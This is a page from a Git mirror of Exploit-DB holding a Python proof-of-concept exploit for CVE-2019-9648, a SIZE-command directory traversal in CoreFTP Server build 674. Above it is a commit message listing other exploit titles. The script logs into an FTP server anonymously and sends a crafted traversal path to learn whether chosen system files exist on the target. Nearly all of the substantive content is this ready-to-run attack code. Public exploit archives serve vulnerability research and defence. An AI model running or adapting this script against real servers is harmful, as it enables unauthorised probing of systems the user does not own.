bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/46535.txt
Offensive Security f3c28b3d62 DB: 2019-05-01 
23 changes to exploits/shellcodes

SpotAuditor 3.6.7 - Denial of Service (PoC)
SpotAuditor 3.6.7 - 'Base64 Encrypted Password' Denial of Service (PoC)
SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)
Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification

IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter)
IP-Tools 2.5 - 'Log to file' Local Buffer Overflow (SEH) (Egghunter)

DeviceViewer 3.12.0.1 - 'user' SEH Overflow
Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow
Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow
Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit)
AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)
Pimcore < 5.71 - Unserialize RCE (Metasploit)
Netgear DGN2200 / DGND3700 - Admin Password Disclosure
Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)
Intelbras IWR 3000N - Denial of Service (Remote Reboot)
Joomla! Component ARI Quiz 3.7.4 - SQL Injection
Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery
HumHub 1.3.12 - Cross-Site Scripting
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)
Domoticz 4.10577 - Unauthenticated Remote Command Execution
Joomla! Component JiFile 2.3.1 - Arbitrary File Download
Hyvikk Fleet Manager - Shell Upload
Agent Tesla Botnet - Information Disclosure
Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
2019-05-01 05:02:01 +00:00

85 lines
No EOL
3.7 KiB
Text
Raw Blame History

# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674 SIZE Directory Traversal
# Google Dork: N/A
# Date: 4/27/2019
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.coreftp.com
# Software Link: http://www.coreftp.com/server/index.html
# Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
# Tested on: Windows 7
# CVE : CVE-2019-9648
#!/usr/bin/python
import socket
import sys
########################################################
###########Set Variables For Script Here################
file_to_look_for = "nslookup.exe"
local_disk_drive = " C:"
path_traversal = "\..\..\..\..\..\Windows\System32\\"
########################################################
print ("""
##### # # ####### ##### ### # ##### ##### ##### # #####
# # # # # # # # # ## # # # # # # # # # #
# # # # # # # # # # # # # # # # # #
# # # ##### ##### ##### # # # ###### ##### ###### ###### # # #####
# # # # # # # # # # # # ####### # #
# # # # # # # # # # # # # # # # # #
##### # ####### ####### ### ##### ##### ##### ##### # #####
#######
# # # ##### # #### # #####
# # # # # # # # # #
##### ## # # # # # # #
# ## ##### # # # # #
# # # # # # # # #
####### # # # ###### #### # #
# # ###### # # #
# # # ##### # ##### ##### ###### # # # # # # ### # # ###### # # # # #
# # # # # # # # # ## # # # # # # # # # # # # ## #
# # # # # # # # ##### # # # ###### # ### ##### # # # # # #
# # # ##### # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # ## # # # ### # # # # # # # ##
## ## # # # # # ###### # # ###### # # # # ###### ## # # #
######
# # ## # # ##### ## # #
# # # # ## # # # # # # #
###### # # # # # # # # # # #
# # ###### # # # # # ###### # #
# # # # # ## # # # # # #
# # # # # # ##### # # ###### ######
""")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect(('192.168.0.4',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.recv(1024)
s.send('SIZE' +local_disk_drive+path_traversal+file_to_look_for + '\r\n')
result = s.recv(2048)
trimmedoutput = result.strip()
splitoutput = trimmedoutput.split(' ')
realresult = unicode (trimmedoutput,'utf-8')
realresult2 = unicode (splitoutput[1],'utf-8')
isnum = realresult.isnumeric()
isnum2 = realresult2.isnumeric()
if isnum2:
print "The file " + file_to_look_for + " exist on the remote server. Here is the filesize:" + splitoutput[1]
else:
print "The file " + file_to_look_for + " does not exist on the remote server or one of the variables declared is incorrect."
s.send('QUIT\r\n')
s.close
Reference in a new issue View git blame Copy permalink